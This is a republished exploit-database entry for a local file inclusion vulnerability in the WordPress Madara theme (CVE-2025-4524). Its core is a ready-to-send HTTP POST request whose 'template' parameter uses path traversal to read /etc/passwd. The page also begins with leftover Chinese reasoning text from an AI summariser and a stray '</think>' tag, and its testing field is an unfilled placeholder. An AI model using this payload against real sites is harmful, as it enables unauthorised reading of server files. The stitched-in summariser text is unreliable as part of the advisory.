[webapps] WordPress Madara - Local File Inclusion
好的,我现在需要帮用户总结一篇文章的内容,控制在一百个字以内。用户给的是一篇关于WordPress Madara主题本地文件包含漏洞的详细报告。 首先,我得理解文章的主要内容。文章提到了漏洞的标题、日期、作者、供应商主页、软件链接、测试环境和CVE编号。攻击向量是通过特定的body路径,而POC则是一个POST请求,利用了模板参数来读取系统文件,比如/etc/passwd。 接下来,我需要将这些信息浓缩到100字以内。重点包括漏洞名称、影响范围(WordPress Madara主题)、攻击方式(利用模板参数)、以及可能的影响(读取敏感文件)。 然后,我要确保语言简洁明了,不使用任何复杂的术语,同时避免使用“文章内容总结”这样的开头。直接描述漏洞的情况和影响即可。 最后,检查字数是否符合要求,并确保信息准确无误。 </think> 该漏洞存在于WordPress Madara主题中,允许攻击者通过构造特定请求实现本地文件包含攻击。 2026-4-6 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:3 收藏

# Exploit Title: WordPress Madara Local File Inclusion 
# Date: November 1, 2025
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: WordPress Theme Madara
# Software Link: WordPress Theme Madara
# Tested on: [OS / PHP / WordPress versions used in testing — e.g., Ubuntu 22.04, PHP 8.1, WP 6.4]
# CVE: CVE-2025-4524


#Attack Vector
body="/wp-content/plugins/madara/"

#POC
POST /wp-admin/admin-ajax.php HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 490

action=madara_load_more&page=1&template=plugins/../../../../../../../etc/passwd&vars%5Borderby%5D=meta_value_num&vars%5Bpaged%5D=1&vars%5Btimerange%5D=&vars%5Bposts_per_page%5D=16&vars%5Btax_query%5D%5Brelation%5D=OR&vars%5Bmeta_query%5D%5B0%5D%5Brelation%5D=AND&vars%5Bmeta_query%5D%5Brelation%5D=AND&vars%5Bpost_type%5D=wp-manga&vars%5Bpost_status%5D=publish&vars%5Bmeta_key%5D=_latest_update&vars%5Border%5D=desc&vars%5Bsidebar%5D=right&vars%5Bmanga_archives_item_layout%5D=big_thumbnail
            

文章来源: https://www.exploit-db.com/exploits/52487
如有侵权请联系:admin#unsafe.sh